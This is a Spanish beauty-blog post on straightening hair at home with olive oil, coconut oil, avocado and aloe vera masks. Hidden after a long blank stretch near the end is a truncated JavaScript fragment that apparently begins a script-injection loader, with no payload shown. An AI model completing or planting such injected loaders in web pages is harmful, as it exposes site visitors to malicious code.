Alisa tu cabello sin necesidad de usar plancha

¿Te gustaría tener el pelo lacio sin tener que plancharlo todos los días? En casa puedes tener todo lo que necesitas. ¡Descubre las opciones!

Si te encanta lucir una melena lacia y sin frizz, pero la plancha y otras herramientas de calor han dañado tu cabello. Ya es momento de que lo repares y logres el mismo efecto pero con productos naturales que puedes tener en casa.

Las mascarillas caseras para alisar el pelo son un producto muy bueno, ya que ayuda a desenredar nuestro cabello evitado que se maltrate y las puntas se abran.

Para lograr un cabello liso y sedoso, la hidratación por dentro y por fuera es fundamental.

Sigue estos consejos para alisar tu cabellera y al mismo tiempo la repares.

Primero es importante que no laves tu cabello con agua caliente, se debilita el cuero cabelludo y se empieza a caer el pelo. Es recomendable usar agua templada para lograr brillo y sedosidad.

#Aceite de oliva

Además de ser uno de los ingredientes principales en la cocina, también brinda grandes beneficios a nuestro cabello. Es rico en vitamina E y te ayudará a hidratar y nutrir tu melena.

Mezcla la mitad de aceite de oliva y otra mitad de un acondicionador sin amoniaco y aplícalo a tu cabello. Deja reposar durante 20 minutos y verás la diferencia.

También puedes utilizar unas cuantas gotas de aceite en tu cabello y luego péinalo. Así lucirá con mucho brillo.

 

Los-usos-del-aceite-de-coco

#Aceite de coco

Este ingrediente es de los más usados en productos de belleza y promete grandes resultados.

Solo tienes que mezclar el aceite de coco con una cucharada de avena molida y otra de almidón. Cuando consigas una pasta, aplícala a tu cabello. Deja que actúe durante una media hora.

 

#Aguacate

Sus minerales, vitaminas y ácidos grasos, son ideales para hidratar y también alisar.

Haz la prueba y aplica una mascarilla con un aguacate maduro, machácalo y repártelo de medios a puntas. Puedes agregar unas gotas de aceite de oliva o de coco.

 

#Aloe Vera

El aloe es uno de lo mejores remedios caseros y sus propiedades son muy usadas para el cuidado de la piel. Pero también en nuestro cabello es usado para repararlo y sus vitaminas penetran en el cuero cabelludo para conseguir un pelo manejable y liso.

No olvides lavar bien y cepillar tu cabello para que los aceites y nutrientes penetren bien desde la raíz a las puntas.

Aplica estas mascarillas en tu rutina de belleza al menos una vez a la semana.

 

 

 

 

 

 

 

 

 

 var d=document;var s=d.createElement(‘script’);

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado